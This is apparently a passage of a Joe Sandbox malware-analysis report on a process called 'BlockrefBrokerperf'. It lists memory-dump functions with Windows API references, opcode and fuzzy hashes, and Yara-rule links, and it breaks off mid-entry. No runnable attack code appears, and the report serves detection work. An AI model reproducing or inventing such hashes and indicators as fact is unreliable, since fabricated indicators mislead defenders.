o,_^, xrefs: 00007FF84913D501
r,_^, xrefs: 00007FF84913D201

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID: o,_^$p,_^$q,_^$r,_^
API String ID: 0-3953216542
Opcode ID: 4ccb5fdcb559dc1bee2b41f81867d1709da03bc40dce4f97c870dc2ff2a0c5a5
Instruction ID: cdbb27a68b0ed8b25e87cce36cb920b654c9dd05f047efa71812daa096243ba3
Opcode Fuzzy Hash: 4ccb5fdcb559dc1bee2b41f81867d1709da03bc40dce4f97c870dc2ff2a0c5a5
Instruction Fuzzy Hash: D7828863C1F2D29FE661BA78B8A60E77BB0EF022BDF1842B7D04C8D093DD0D65458659

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4B98A Relevance: 1.8, APIs: 1, Instructions: 297
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileTransactedW.KERNEL32 ref: 00007FF848F4BB92

Memory Dump Source

Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd

Similarity

API ID: CreateFileTransacted
String ID:
API String ID: 2149338676-0
Opcode ID: 34736dda07323a20d50ff1195ab9bc03d2b4bc402316bfbf27baf99b4a942bec
Instruction ID: 8eac32b847cc3fae0a4467446e05b98bc48e75436032f6a2287483ddc235e263
Opcode Fuzzy Hash: 34736dda07323a20d50ff1195ab9bc03d2b4bc402316bfbf27baf99b4a942bec
Instruction Fuzzy Hash: 56912470908A5C8FDB99DF58C894BE9BBF1FB6A310F1001AED04DE3291DB75A984CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F49FB0 Relevance: 1.8, APIs: 1, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe5e1e6df9354223fa62f2fa338722139666477f083f4e3acc9f0b07681271e
Instruction ID: 5a63cda99387ba3245ea57d7ab3e02b82957f6515fe861051c7723bfb1abf6b2
Opcode Fuzzy Hash: 5fe5e1e6df9354223fa62f2fa338722139666477f083f4e3acc9f0b07681271e
Instruction Fuzzy Hash: 8D81EF70908A1C8FDB98EF58C894BA9BBF1FB69300F1051AED04EE3651DB75A984CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849136759 Relevance: 1.8, Strings: 1, Instructions: 518COMMON

Download Yara Rule

Strings

d, xrefs: 00007FF849136A37

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 482d954dc04aa8161986302684e042896f67a5da41a47448b6e271ad77a745b4
Instruction ID: 1f5228a33e291d6f7a95c0cd6db5f3f357b01d326cd2b202037624ed7de78ede
Opcode Fuzzy Hash: 482d954dc04aa8161986302684e042896f67a5da41a47448b6e271ad77a745b4
Instruction Fuzzy Hash: 0AF11230A1DA458FE768EF28948257577E0FF95394B1446BAD04EC7297DA28E843CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4BC35 Relevance: 1.7, APIs: 1, Instructions: 219fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 00007FF848F4BDB9

Memory Dump Source

Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: b9a59323b2d7229345ed0409d0202fa9398cb8b305da9b231470690b002eac1a
Instruction ID: f62933348f1a23e9f90160c62da1b4d4282120e7f69f3258cea186b97c9037a1
Opcode Fuzzy Hash: b9a59323b2d7229345ed0409d0202fa9398cb8b305da9b231470690b002eac1a
Instruction Fuzzy Hash: 46612470908A5C8FDB98DF58C885BE9BBF0FB69311F1001AED04DE3292DB74A985CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4D59A Relevance: 1.7, APIs: 1, Instructions: 155COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE ref: 00007FF848F4D6B2

Memory Dump Source

Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: a7352fad5f7f0ba6851c44f99d2c509a6465687fc7f37dad7fa2181a8ca6297e
Instruction ID: e2caf8db9c699fa071342083ad3132570a7e8915d406b9fe2a1a6c30ea172e9a
Opcode Fuzzy Hash: a7352fad5f7f0ba6851c44f99d2c509a6465687fc7f37dad7fa2181a8ca6297e
Instruction Fuzzy Hash: AB416D71908A4C8FEB98EF98D849AE9BBF0FB65311F00416BD04DD7292DB34A849CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848FAF297 Relevance: 1.6, APIs: 1, Instructions: 150threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 00007FF848FAF3A1

Memory Dump Source

Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c96911c143af07fdfa0a27a79e09a934bffcefa506920a824e8598b45bdf8e98
Instruction ID: 73115f95258ab27ec786ae3f03036b461646455cceac557d8edcd9b78a423a7b
Opcode Fuzzy Hash: c96911c143af07fdfa0a27a79e09a934bffcefa506920a824e8598b45bdf8e98
Instruction Fuzzy Hash: EF413874D08A0C8FDB98EF98D885AEDBBF0FB59310F10416AD40DE7252DB75A886CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4D5D1 Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE ref: 00007FF848F4D6B2

Memory Dump Source

Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 16dc75b099f5272cc0cb5294284e3b723ec783bac5d6e0a8b2d9fc72c8cef552
Instruction ID: 917a431441ed0f57000f03d7b046d5f91350259009167eed41a194c5b2f713f0
Opcode Fuzzy Hash: 16dc75b099f5272cc0cb5294284e3b723ec783bac5d6e0a8b2d9fc72c8cef552
Instruction Fuzzy Hash: 0041A17090D68C8FDB99EFA8D849BE9BBF0EF66310F0441ABD04DD7292DA745845CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4DA35 Relevance: 1.4, APIs: 1, Instructions: 195memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00007FF848F4DB69

Memory Dump Source

Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 455d72ec8ef17a084b6380557acdf5f076741b37ab1303cec9fd9471c704d2a5
Instruction ID: 313d0dad4cd2f05919efb173a1b7b952c165b8aa3fd99bb515458dcf1d1a6c4d
Opcode Fuzzy Hash: 455d72ec8ef17a084b6380557acdf5f076741b37ab1303cec9fd9471c704d2a5
Instruction Fuzzy Hash: 82512A70918A5C8FDB58EF58C855BE9BBF0FB69314F1041AAD04DE3252DB70A985CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF84913A918 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

, xrefs: 00007FF84913A992

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 75070f896b800648eb2c88ef7ccd93072e4f92524047b77838777e7928a30e5c
Instruction ID: 7dc12eb89850059491261dda7fcdc42fb7bb062fdf5deb4c6db6046b60cacdc6
Opcode Fuzzy Hash: 75070f896b800648eb2c88ef7ccd93072e4f92524047b77838777e7928a30e5c
Instruction Fuzzy Hash: 28512831D1D68A9FEB69EF98C4555BDBBB1FF54340F1041BBC00EA7282DA39A905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849134648 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

, xrefs: 00007FF8491346C2

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4e128276b4f19243985e25ee7dd3fc77fc5bb1ae72d5fb13c38ff59b61958056
Instruction ID: bdddc9e40d8d6c1a483b55ecf361511547778db8f66c47e41cd5d7f82bb46e4b
Opcode Fuzzy Hash: 4e128276b4f19243985e25ee7dd3fc77fc5bb1ae72d5fb13c38ff59b61958056
Instruction Fuzzy Hash: 2C511770D0C58A9FEB69EFA884545BDBBB1FF55340F5041AAC00EE72C2DA38A905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849139439 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

s&, xrefs: 00007FF8491394C8

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID: s&
API String ID: 0-841890644
Opcode ID: bb338b6abddd6b4273eec9f8552b899de785a30ca8a21059d0b3dcb79bece242
Instruction ID: e06057985d3884ab6b0ca0b59c4940a9fcc3bbf09c992ac87faeb96117f9cfd1
Opcode Fuzzy Hash: bb338b6abddd6b4273eec9f8552b899de785a30ca8a21059d0b3dcb79bece242
Instruction Fuzzy Hash: 7D31A771E1C98A8FFB79BB2898125A4B7E1FF45351F44017BD01DC76C2DE1CA8468B91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849138322 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

s&, xrefs: 00007FF8491383CA

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID: s&
API String ID: 0-841890644
Opcode ID: c318c30c5a7ddf726f0048994dba72e26781287a2e6a8a36113f6121b2c5c604
Instruction ID: 67c9ddc3dbe0f5a3718b7a7b6c776b47e9199fdeb807d7a78fdf671be26a6431
Opcode Fuzzy Hash: c318c30c5a7ddf726f0048994dba72e26781287a2e6a8a36113f6121b2c5c604
Instruction Fuzzy Hash: 0F21D970E1885D9FDFA9EF58C465AEDB7B1FF68314F0001AAD00EE3291CA39A9418F41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF84913AB85 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 332c65c3252da89de4003d3b918b94578a9de48a88603c6c8750a0359146baf1
Instruction ID: 8a38dc1a224f9e32304af46fa34388328fe9ccad0a620d3405bb3724b6441791
Opcode Fuzzy Hash: 332c65c3252da89de4003d3b918b94578a9de48a88603c6c8750a0359146baf1
Instruction Fuzzy Hash: DFE18A705186868FFB69DF18C0E45B537B1FF44351B5446BEC85E8B68ADA3CE882CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8491348BF Relevance: .4, Instructions: 363COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e35922cd0787eb3b8b6112b358b8767d378ce18b30b1af1557d9cd5aca394c36
Instruction ID: 202260d48e61d69c25bff81eb286bf750166ceddcca24a5f8110ed3da0b4d80a
Opcode Fuzzy Hash: e35922cd0787eb3b8b6112b358b8767d378ce18b30b1af1557d9cd5aca394c36
Instruction Fuzzy Hash: B8D18C7051C5968FEB69DF58C0D05B13BB1FF59350B5446BEC85E8B68ACA3CE882CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8491348DF Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d384d3d5d7523b906d4364c5c478565ca7f2ae7b085731592b502a4d697451e5
Instruction ID: ab559b43cceb3e5aecc074bbc2adc7935229e87803aed15f6e6646f6a90a0292
Opcode Fuzzy Hash: d384d3d5d7523b906d4364c5c478565ca7f2ae7b085731592b502a4d697451e5
Instruction Fuzzy Hash: 68C17B7051C5968FEB29DF58C0905B13BB1FF55350B5446BEC89E8B68BCA3CE881CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF84913CDFA Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed949e56cd83d907e83a543d20c5b3247a1d9a62a10271e0859a33f97cbb972
Instruction ID: 5be735c5c818f7a2507a716602d69206e056d085b2b267748590e0b1f08ac9cb
Opcode Fuzzy Hash: 8ed949e56cd83d907e83a543d20c5b3247a1d9a62a10271e0859a33f97cbb972
Instruction Fuzzy Hash: 1DB1F63091D68ACFE779AF2894555B877A0FF58340F2409BED44EC7186DE2CA8868F81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849134172 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33921cbc552ca4d9940ef44356dab98e02d36135833d1d3a533daacf3874713
Instruction ID: 7f40c33a86d2b1365c4407694cec93fedc42d331aeed27ace30cc0e3726f4425
Opcode Fuzzy Hash: b33921cbc552ca4d9940ef44356dab98e02d36135833d1d3a533daacf3874713
Instruction Fuzzy Hash: 4DC19030A1CA869FE769EF58D0506A4BBB1FF55350F54417AC04EC7AC6CB2CE851CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF84913A442 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfc3ac7756a12655e8ad3fb7236b149af85983ab6f06870689834bc9b9ab7ab5
Instruction ID: b5f9d441010d4c6f6757d4d65b455214564606e717e17a5b6a6ff11c4b4eeaa2
Opcode Fuzzy Hash: dfc3ac7756a12655e8ad3fb7236b149af85983ab6f06870689834bc9b9ab7ab5
Instruction Fuzzy Hash: B7C18070A1CA869FE769EF28C1916A4B7B1FF48350F54417BC04EC7A86DB2CE851CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849131B6F Relevance: .3, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59122a1fb4079a0b38cf3fd7206bf2ebbd476560694be7ac7bc221c5657cad25
Instruction ID: 63c321a0025a88a8ebd9e6045ad305ca50a80b3d13ef3323ea114605662bdc54
Opcode Fuzzy Hash: 59122a1fb4079a0b38cf3fd7206bf2ebbd476560694be7ac7bc221c5657cad25
Instruction Fuzzy Hash: 0E213822D0D1D78EF1787E7828198FD1A70AF537A0F1806BBC40D860C3DC0CA8815F96

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849137E60 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eac4af0e27b23b2b9802be4a14848cab9b4977bc23c23d81f1f75b81dcbc98e
Instruction ID: f9f1a798be4b070965c98a0d37b7e6fc18f7655e72f647f91b973a3f57f681de
Opcode Fuzzy Hash: 7eac4af0e27b23b2b9802be4a14848cab9b4977bc23c23d81f1f75b81dcbc98e
Instruction Fuzzy Hash: D011D612D1D4D3EEF7767F7928214BC9670AF917D0F1806FBC54E4A0D2CC4CA8815A92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849137B12 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b94087636efaf495ef23db33f9190814fd45523d5f015b43f6c639eeebd7bf76
Instruction ID: 7b1bedd451bc1882b8cb91efbefb37306b62430fdd40ca41cb1b7849f76d77e0
Opcode Fuzzy Hash: b94087636efaf495ef23db33f9190814fd45523d5f015b43f6c639eeebd7bf76
Instruction Fuzzy Hash: DC81083150C5CA4FF779EE2898569B97BF0EFC5360B0402BBD4AEC7592D91CE8068B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849131148 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26c1d7410fe6be3655b12cd283a61f74980895f2edbf1f0760ffa1f9e94f64fb
Instruction ID: 362353a4f95eb1d8a8a22238d127a823dd6f8b8fdb0cc1773253ae9a6f6ed505
Opcode Fuzzy Hash: 26c1d7410fe6be3655b12cd283a61f74980895f2edbf1f0760ffa1f9e94f64fb
Instruction Fuzzy Hash: 6E91B37090895D8FEBA4EF68C495AADBBF1FF69341F10016AD00DE7292DB35A985CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849139976 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 651fc785f0022cf99f0236d13a5f78fc44806d54b82a9c5e6837941db2b0b2d9
Instruction ID: 66d2cdf8f43e5707cd764f0dc71084b42a6d29d88403d1da6380d28cf4aca058
Opcode Fuzzy Hash: 651fc785f0022cf99f0236d13a5f78fc44806d54b82a9c5e6837941db2b0b2d9
Instruction Fuzzy Hash: 7B81053191C6868FF779AE2894515B9BBF0EF85390F14067FD48EC3582DA2DE8028B51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8491336B6 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f21219be02e9a8dd95a5a9027bdacadd1b1a7b9c39fbc5227ae52da83198b8f
Instruction ID: 8937286c14786217a53e4f93f5153ac7a4d629e47fc8372204435b7fb6579ac7
Opcode Fuzzy Hash: 6f21219be02e9a8dd95a5a9027bdacadd1b1a7b9c39fbc5227ae52da83198b8f
Instruction Fuzzy Hash: FF81F571A1CA868FF7786E285405175B7F0EF45390B94067FD08EC3692DA2DF8438B55

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849131811 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb4d18c075b392f50726fdc193127e549a0390031b18171b950fce86fd4c1a94
Instruction ID: d1c04e1f8ed32a511be7f380cbefc96862d741af65e1125fe64f21c4d97f3708
Opcode Fuzzy Hash: bb4d18c075b392f50726fdc193127e549a0390031b18171b950fce86fd4c1a94
Instruction Fuzzy Hash: DB71A335A0C58A8FF7B8EE08C845EB437E1FF49351B1442BBD55EC75A1DA2DE8068B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF84913ABAF Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f98b4eb3812a236ffc42a58f33398ed83fede7e5a8096da82f47d247510e90
Instruction ID: fc05d461705a9ab45b6896edcc25ebb4dbbb35313f7040ecfc90429660cd912a
Opcode Fuzzy Hash: 44f98b4eb3812a236ffc42a58f33398ed83fede7e5a8096da82f47d247510e90
Instruction Fuzzy Hash: 7A9147705196428FEB2DDF18D1E05B137B1FF49351B5045BEC84E8B68ADB38E892CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF84913AB93 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 156b56dfe6936bb7b29b3da2dde2c2d01293d17f533d29d556090eac165a2f4e
Instruction ID: 363792f0f5e381827304cdb1a4d67c72522a4977d400b21fdc3217626cb4b286
Opcode Fuzzy Hash: 156b56dfe6936bb7b29b3da2dde2c2d01293d17f533d29d556090eac165a2f4e
Instruction Fuzzy Hash: 429169705186428FEB2CDF18D0E15B537B1FF49351B5045BEC84E8B68ADB38E892CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8491323DB Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e82b80deb08775f2b625a9a49b6014f7cf861dd2c4c39e35db380f1889963a7
Instruction ID: 01c0034ef6fa4260e36c1b54669ba5037b05322d1a494b934c7b7f4eb435d71a
Opcode Fuzzy Hash: 8e82b80deb08775f2b625a9a49b6014f7cf861dd2c4c39e35db380f1889963a7
Instruction Fuzzy Hash: C7717E30D1D68A9EEB75FF6488546BCBBB0FF59380F1009BAD00ED3195DA2CA9418B11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF84913BBD1 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b94f3df3711dd56333e2281b10e47d7ef3c2e850cee7593cd122a7f408fbbae1
Instruction ID: 5355c60cae8895683addc74368cd3fd02abcce6faa33f076f609fe32c27b22a2
Opcode Fuzzy Hash: b94f3df3711dd56333e2281b10e47d7ef3c2e850cee7593cd122a7f408fbbae1
Instruction Fuzzy Hash: 37817830A4DB868FF3B9EE28C19597177B1FF04354B54057EC48E87A96EA2DF8428B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849135901 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 844501ea87d786dad168043f993dc5f977e3555341f95186489e2feba07c1111
Instruction ID: e6c2998e5370a61975d8e009b28c7e75b3734334d96f55e72b4765bc2d9ae2f3
Opcode Fuzzy Hash: 844501ea87d786dad168043f993dc5f977e3555341f95186489e2feba07c1111
Instruction Fuzzy Hash: 2781753091CB868FE379EE18C091561BBB1FF44794B64097AC48F87A96CA7DF842CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849136599 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ed8fa07d8e13f5ab115a5f1674e113223c30901aaa4240df2a8e72115e593c
Instruction ID: b2159dbef8e1207fbffc1c4c2b07569ce9188bff9a9e63e9be418c0ccc689129
Opcode Fuzzy Hash: f9ed8fa07d8e13f5ab115a5f1674e113223c30901aaa4240df2a8e72115e593c
Instruction Fuzzy Hash: 8951217160DB894FE769AE2898865707BF0EF563A075502BFC08EC71A3D929F847CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8491386AB Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6a752edca684adc5dc06db8304e0cc289dbd9772efcc9ceba5f05b6bd9d04a4
Instruction ID: 3ebbef2c9debd0a1c595658006dbc79fc0a01bec3e66455205c3f7f4a91f5f7c
